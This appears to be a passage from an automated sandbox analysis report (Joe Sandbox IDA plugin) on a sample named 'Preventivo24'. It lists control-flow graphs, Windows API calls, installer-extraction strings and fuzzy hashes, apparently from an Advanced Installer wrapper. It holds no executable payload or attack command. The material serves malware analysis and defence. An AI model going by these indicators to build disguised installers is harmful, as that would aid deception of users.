                                                                              • Instruction Fuzzy Hash: FEE1AE71900618DBDB25DF28CC55BAEB7B5EF48320F184299E869A73D1DB34AE41CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 00FDADC4
                                                                              • SetLastError.KERNEL32(0000000E), ref: 00FDADE1
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00FDADF9
                                                                              • EnterCriticalSection.KERNEL32(011D536C), ref: 00FDAE16
                                                                              • LeaveCriticalSection.KERNEL32(011D536C), ref: 00FDAE39
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000010), ref: 00FDB056
                                                                              • SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 00FDB2E3
                                                                                • Part of subcall function 01003BE0: CloseHandle.KERNEL32(?,B5580983,?,00000010,?,00000000,01103163,000000FF,?,00FDF542,00000000,00000000,00000000,00000001,?,0000000D), ref: 01003C1A
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00FDB08A
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                                • Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,00000000,?,011D0080,00FF7258,?), ref: 00FA4468
                                                                                • Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 00FA449A
                                                                              • DialogBoxParamW.USER32(000007D0,00000000,00F05290,00000000), ref: 00FDAE56
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$CriticalHeapSection$ActiveAllocateCloseCurrentDialogEnterErrorEventFindHandleLastLeaveParamProcessResourceThreadWindow
                                                                              • String ID: Advinst_Extract_$Code returned to Windows by setup:$FILES.7z
                                                                              • API String ID: 1122345507-2771609608
                                                                              • Opcode ID: 8606b9da175b241f620b3e96fae8bc0278912ae5c1653f0fc72d61572e32d574
                                                                              • Instruction ID: 46b911f151a7902f0f783489240922bb65ba189595057c594bcae5a5d0367d0b
                                                                              • Opcode Fuzzy Hash: 8606b9da175b241f620b3e96fae8bc0278912ae5c1653f0fc72d61572e32d574
                                                                              • Instruction Fuzzy Hash: 3CA2BC31D00248CFDB15DF68C855BEEBBB5AF48320F18819AE519AB391DB34AE45DF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2032 10034d0-1003507 call e8b400 2035 10036f0-10036f5 call e8b070 2032->2035 2036 100350d-100352d 2032->2036 2038 10036fa-1003719 call e8b070 2035->2038 2043 1003530-1003543 2036->2043 2044 10038fc-1003900 2038->2044 2045 100371f-1003728 2038->2045 2046 1003552-1003559 2043->2046 2047 1003545-100354f call e8ae70 2043->2047 2048 1003794-1003799 2045->2048 2049 100372a-1003775 call fc16f0 SetWindowTextW call f05ed0 GetDlgItem SendMessageW 2045->2049 2055 1003561-1003566 2046->2055 2047->2046 2048->2044 2051 100379f-10037ae 2048->2051 2072 1003779-1003791 2049->2072 2056 10037b0-10037e3 GetDlgItem * 2 SendMessageW 2051->2056 2057 100380f-1003817 2051->2057 2059 10036ac-10036ae 2055->2059 2060 100356c-100356e 2055->2060 2061 10037e5-10037e7 2056->2061 2062 10037e9-10037ed 2056->2062 2063 1003819-1003838 EndDialog 2057->2063 2064 100383b-1003843 2057->2064 2067 10036b1-10036c6 2059->2067 2060->2059 2068 1003574-1003587 call 1094790 2060->2068 2069 10037ee-100380a SendMessageW 2061->2069 2062->2069 2064->2044 2065 1003849-100385d GetDlgItem 2064->2065 2070 10038d3-10038d6 call e8ac40 2065->2070 2071 100385f-100386b 2065->2071 2073 10036c8-10036d8 2067->2073 2074 10036dc-10036ef 2067->2074 2068->2038 2083 100358d-1003593 2068->2083 2069->2072 2080 10038db-10038f9 EndDialog 2070->2080 2084 1003871-1003883 2071->2084 2085 1003903-100391d call e8b070 call 1003930 2071->2085 2073->2074 2083->2038 2086 1003599-10035ae call e8b400 2083->2086 2087 1003885-1003889 call e8ae70 2084->2087 2088 100388e-100389e 2084->2088 2104 100392a-100392d 2085->2104 2105 100391f-1003927 call 108a703 2085->2105 2086->2035 2094 10035b4-10035e6 2086->2094 2087->2088 2097 10038a0-10038a5 2088->2097 2098 10038b9-10038bb 2088->2098 2112 10035f5-1003616 call 1094790 2094->2112 2113 10035e8-10035f2 call e8ae70 2094->2113 2102 10038a7-10038a9 2097->2102 2103 10038ab-10038b7 call 1094790 2097->2103 2098->2085 2100 10038bd-10038c3 2098->2100 2100->2085 2106 10038c5-10038d1 2100->2106 2102->2100 2103->2098 2105->2104 2106->2080 2112->2038 2119 100361c-100361f 2112->2119 2113->2112 2119->2038 2120 1003625-100363b call e97830 2119->2120 2123 100366b-1003670 2120->2123 2124 100363d-100364f 2120->2124 2127 1003672-1003676 call ea5bf0 2123->2127 2128 100367b-100368f 2123->2128 2125 1003651-1003661 2124->2125 2126 1003665-1003666 2124->2126 2125->2126 2126->2043 2127->2128 2130 1003691-10036a5 2128->2130 2131 10036a8-10036aa 2128->2131 2130->2131 2131->2067
                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 01003746
                                                                              • GetDlgItem.USER32(00000000,000007D1), ref: 0100375D
                                                                              • SendMessageW.USER32(00000000,000000D2,00000000,00000000), ref: 0100376F
                                                                              • GetDlgItem.USER32(00000000,000007D1), ref: 010037B8
                                                                              • GetDlgItem.USER32(00000000,0000042D), ref: 010037C8
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010037D8
                                                                              • SendMessageW.USER32(00000000,000000CC,?,00000000), ref: 010037F4
                                                                              • EndDialog.USER32(00000000,00000002), ref: 01003821
                                                                              • GetDlgItem.USER32(00000000,000007D1), ref: 01003853
                                                                              • EndDialog.USER32(00000000,00000001), ref: 010038E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Item$MessageSend$Dialog$HeapProcessTextWindow
                                                                              • String ID: PackageCode
                                                                              • API String ID: 374704001-1525858878
                                                                              • Opcode ID: 8b3136d41b43e2cc38054bc9dd3429aff0dba7a67cdd74f35ce82bc188a35c66
                                                                              • Instruction ID: ee5ac3681a968e0ed4e98ab6d9372f826703d65881ae8579e5b094f2e9ec41b5
                                                                              • Opcode Fuzzy Hash: 8b3136d41b43e2cc38054bc9dd3429aff0dba7a67cdd74f35ce82bc188a35c66
                                                                              • Instruction Fuzzy Hash: DAD12431A01606AFEB16DF68CC45B6EBBE1FF48310F004169F969AB3D1DB75A941CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2135 feb9c0-feb9f4 2136 feb9fa-feba14 GetActiveWindow 2135->2136 2137 febbe5-febbf6 2135->2137 2138 feba16-feba18 call fe1dc0 2136->2138 2139 feba22-feba2a 2136->2139 2143 feba1d KiUserCallbackDispatcher 2138->2143 2141 feba2c-feba36 call 108a23a 2139->2141 2142 feba45-feba54 call 108a33c 2139->2142 2141->2142 2148 feba38-feba40 SetLastError 2141->2148 2149 febc0e-febc15 call e9c3a0 2142->2149 2150 feba5a-febabf GetCurrentThreadId EnterCriticalSection LeaveCriticalSection CreateDialogParamW 2142->2150 2143->2139 2151 febac5-febadc GetCurrentThreadId 2148->2151 2153 febc1a-febc24 call e8b070 2149->2153 2150->2151 2156 febb4e-febb78 SetWindowTextW GetDlgItem SetWindowTextW 2151->2156 2157 febade-febae5 2151->2157 2156->2137 2159 febb7a-febb84 call e8b400 2156->2159 2160 febaf8-febb35 call fc0f10 call e8a2e0 2157->2160 2161 febae7-febaf3 call ea5bf0 call fc8090 2157->2161 2159->2153 2168 febb8a-febbbb call e8a880 2159->2168 2160->2156 2173 febb37-febb4b 2160->2173 2161->2160 2179 febbbd-febbcf 2168->2179 2180 febbf9-febc0c GetDlgItem SetWindowTextW 2168->2180 2173->2156 2179->2137 2181 febbd1-febbe1 2179->2181 2180->2179 2181->2137
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 00FEB9FD
                                                                              • SetLastError.KERNEL32(0000000E,?,?,?), ref: 00FEBA3A
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00FEBAC5
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00FEBB54
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00FEBB62
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00FEBB6E
                                                                                • Part of subcall function 00FE1DC0: GetDlgItem.USER32(?,00000002), ref: 00FE1DDD
                                                                                • Part of subcall function 00FE1DC0: GetWindowRect.USER32(00000000,?), ref: 00FE1DF3
                                                                                • Part of subcall function 00FE1DC0: ShowWindow.USER32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00FEBA1D), ref: 00FE1E08
                                                                                • Part of subcall function 00FE1DC0: InvalidateRect.USER32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00FEBA1D), ref: 00FE1E13
                                                                                • Part of subcall function 00FE1DC0: GetDlgItem.USER32(?,000003E9), ref: 00FE1E21
                                                                                • Part of subcall function 00FE1DC0: GetWindowRect.USER32(00000000,?), ref: 00FE1E37
                                                                                • Part of subcall function 00FE1DC0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,00000000), ref: 00FE1E76
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00FEBBFE
                                                                              • SetWindowTextW.USER32(00000000,00000000), ref: 00FEBC06
                                                                                • Part of subcall function 00E9C3A0: RaiseException.KERNEL32(?,?,00000000,00000000,00FA84DC,C0000005,00000001,B5580983,011C63B8,0093A190,?,011D002C,011C63B8,010B1F80,000000FF), ref: 00E9C3AC
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$RectText$ActiveAllocateCurrentErrorExceptionHeapInvalidateLastRaiseShowThread
                                                                              • String ID:
                                                                              • API String ID: 1085195845-0
                                                                              • Opcode ID: 7f0c741ec65566daf911255301614d4a40d7471e6b8a5d507bfbc48ef57dfd46
                                                                              • Instruction ID: 7c86e4ebeab9920a629eed570ecaec71cd13de82651e047679956852aaa70c17
                                                                              • Opcode Fuzzy Hash: 7f0c741ec65566daf911255301614d4a40d7471e6b8a5d507bfbc48ef57dfd46
                                                                              • Instruction Fuzzy Hash: 4F71BB31905649EFCB24DF69CC49B5EBBB1FF04320F148629E525A72D0DB74A940DF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2183 e933c0-e9342c 2184 e93469-e93470 2183->2184 2185 e9342e-e93442 call 108ab55 2183->2185 2187 e936a8-e936e4 call e87cf0 call 108a6f5 2184->2187 2188 e93476 call fb9280 2184->2188 2185->2184 2192 e93444-e93466 call 108aac4 call 108ab04 2185->2192 2193 e9347b-e9347d 2188->2193 2192->2184 2196 e935ce-e935e0 GetTempPathW 2193->2196 2197 e93483-e9348e 2193->2197 2201 e935e2-e935e4 2196->2201 2202 e934da-e934e8 2197->2202 2203 e93490-e934a4 call 108ab55 2197->2203 2201->2187 2207 e935ea-e9360e 2201->2207 2204 e934ea-e934fc 2202->2204 2205 e934fe-e93522 GetWindowsDirectoryW call 10945c5 2202->2205 2203->2202 2214 e934a6-e934d7 GetModuleHandleW GetProcAddress call 108ab04 2203->2214 2219 e93525-e93534 2204->2219 2205->2219 2209 e93611-e9361a 2207->2209 2209->2209 2213 e9361c-e93658 call e887f0 call fae420 2209->2213 2228 e9368b-e936a1 2213->2228 2229 e9365a-e9366f 2213->2229 2214->2202 2219->2201 2225 e9353a-e93587 call fb9490 call fb9680 * 2 call fb9c10 2219->2225 2248 e93589-e935b7 CreateDirectoryW 2225->2248 2249 e935bd-e935cc call fb9530 2225->2249 2228->2187 2231 e93681-e93688 call 108a703 2229->2231 2232 e93671-e9367f 2229->2232 2231->2228 2232->2231 2234 e936e5-e937b0 call 108fa4f call e933c0 call e87cf0 call e88ed0 call e937c0 call e88ed0 call 108a6f5 2232->2234 2248->2249 2249->2201
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,?), ref: 00E934B7
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00E934BE
                                                                              • CreateDirectoryW.KERNEL32(?,?,S-1-5-32-544,10000000,00000001,S-1-5-18,10000000,00000001), ref: 00E935B7
                                                                                • Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
                                                                                • Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A
                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,B5580983,?,?), ref: 00E93504
                                                                              • GetTempPathW.KERNEL32(00000104,?,B5580983,?,?), ref: 00E935DA
                                                                                • Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
                                                                                • Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
                                                                                • Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ExclusiveLock$AcquireDirectoryRelease$AddressConditionCreateHandleModulePathProcTempVariableWakeWindows
                                                                              • String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
                                                                              • API String ID: 846588460-595641723
                                                                              • Opcode ID: bc19dee92dbae7d670c217ea156781f755ee6e5456291a74f081d7834486a816
                                                                              • Instruction ID: 34c16807c22e3e83f63bf97cee112f845f15ccab66e8272f6138561aae711382
                                                                              • Opcode Fuzzy Hash: bc19dee92dbae7d670c217ea156781f755ee6e5456291a74f081d7834486a816
                                                                              • Instruction Fuzzy Hash: CAA1D4B1D05208EBDB24EFA8DD89BDDB7B4AF08714F1001A9E919A7281DBB45F84CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2283 1089fcc-1089fd7 2284 1089fd9-1089fe5 DecodePointer 2283->2284 2285 1089fe6-1089ffd LoadLibraryExA 2283->2285 2286 1089fff-108a014 call 108a07c 2285->2286 2287 108a077 2285->2287 2286->2287 2291 108a016-108a02b call 108a07c 2286->2291 2288 108a079-108a07b 2287->2288 2291->2287 2294 108a02d-108a042 call 108a07c 2291->2294 2294->2287 2297 108a044-108a059 call 108a07c 2294->2297 2297->2287 2300 108a05b-108a075 DecodePointer 2297->2300 2300->2288
                                                                              APIs
                                                                              • DecodePointer.KERNEL32(?,?,?,0108A312,011CE8E4,?,?,?,01003A0D,?,?,?,00000001,?), ref: 01089FDE
                                                                              • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,0108A312,011CE8E4,?,?,?,01003A0D,?,?,?,00000001), ref: 01089FF3
                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0108A06F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DecodePointer$LibraryLoad
                                                                              • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                              • API String ID: 1423960858-1745123996
                                                                              • Opcode ID: 3c00b45bf39323aec605b3530f49ce3b803912eed7f3312ffd03f17770d3da21
                                                                              • Instruction ID: 733d05bf5509a9c864a0f6bb9ee365d3e9571e4bdac714ad934a102d1c5ef589
                                                                              • Opcode Fuzzy Hash: 3c00b45bf39323aec605b3530f49ce3b803912eed7f3312ffd03f17770d3da21
                                                                              • Instruction Fuzzy Hash: CC010C30745301FBD629F6259C02B9E3F845B12784F04006AF9C477656E7725146CBC2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2336 fdfd30-fdfd62 2337 fe008e-fe009f 2336->2337 2338 fdfd68-fdfd6b 2336->2338 2338->2337 2339 fdfd71-fdfd83 GetExitCodeThread 2338->2339 2339->2337 2340 fdfd89-fdfda1 call 1003a20 call e8b400 2339->2340 2345 fdfda7-fdfdcf 2340->2345 2346 fe00a0-fe00b0 call e8b070 2340->2346 2351 fdfddc-fdfde3 call e8aee0 2345->2351 2352 fdfdd1-fdfdda call e8a880 2345->2352 2356 fdfde8-fdfe1b call fdece0 call 108aca0 2351->2356 2352->2356 2361 fdfe1d-fdfe20 2356->2361 2362 fdfe5b-fdfe64 call e8b400 2356->2362 2361->2362 2363 fdfe22-fdfe35 WideCharToMultiByte 2361->2363 2362->2346 2368 fdfe6a-fdfe90 call ec4df0 2362->2368 2363->2362 2365 fdfe37-fdfe55 call 108aca5 WideCharToMultiByte 2363->2365 2365->2362 2374 fdfe9b-fdfea8 call e8b400 2368->2374 2375 fdfe92-fdfe96 call fa4d30 2368->2375 2374->2346 2379 fdfeae-fdfece 2374->2379 2375->2374 2382 fdfee6-fdfeea call fa4450 2379->2382 2383 fdfed0-fdfed6 2379->2383 2387 fdfeef-fdff2b call fb8ff0 call 1003ad0 2382->2387 2383->2382 2384 fdfed8-fdfee4 call e8a880 2383->2384 2384->2387 2393 fdff2d-fdff41 2387->2393 2394 fdff44-fdff58 2387->2394 2393->2394 2395 fdff5a-fdff6e 2394->2395 2396 fdff71-fdff7b call e8b400 2394->2396 2395->2396 2396->2346 2401 fdff81-fdffaa 2396->2401 2406 fdffac-fdffb5 call e8a880 2401->2406 2407 fdffb7-fdffbe call e8aee0 2401->2407 2411 fdffc3-fdfffa WriteFile FlushFileBuffers 2406->2411 2407->2411 2412 fdfffc-fe0010 2411->2412 2413 fe0013-fe0024 2411->2413 2412->2413 2414 fe003a-fe0069 call 108aca0 2413->2414 2415 fe0026-fe0036 2413->2415 2421 fe007f-fe0089 call 1003be0 2414->2421 2422 fe006b-fe007b 2414->2422 2415->2414 2421->2337 2422->2421
                                                                              APIs
                                                                              • GetExitCodeThread.KERNEL32(?,?,B5580983,00000000,00000000,?,?,?,00000000,010FC815,000000FF,?,00FD8C32,?,000000DC,00000000), ref: 00FDFD76
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FDFE2B
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FDFE55
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                                • Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,00000000,?,011D0080,00FF7258,?), ref: 00FA4468
                                                                                • Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 00FA449A
                                                                              • WriteFile.KERNEL32(?,000000DC,?,000000FF,00000000,CLOSE,00000005), ref: 00FDFFDA
                                                                              • FlushFileBuffers.KERNEL32(?), ref: 00FDFFE3
                                                                                • Part of subcall function 01003BE0: CloseHandle.KERNEL32(?,B5580983,?,00000010,?,00000000,01103163,000000FF,?,00FDF542,00000000,00000000,00000000,00000001,?,0000000D), ref: 01003C1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$File$BuffersCloseCodeExitFindFlushHandleHeapProcessResourceThreadWrite
                                                                              • String ID: Advinst_Estimate_$CLOSE
                                                                              • API String ID: 1271795120-755230127
                                                                              • Opcode ID: 8c7484160dea0b47b8ce8465517712afa01e04e9626c392769c6e1cdeef5170c
                                                                              • Instruction ID: dc2fc29dd0234a01c46fa471952932a3670211f5a6435525b64aa92934a9cf0d
                                                                              • Opcode Fuzzy Hash: 8c7484160dea0b47b8ce8465517712afa01e04e9626c392769c6e1cdeef5170c
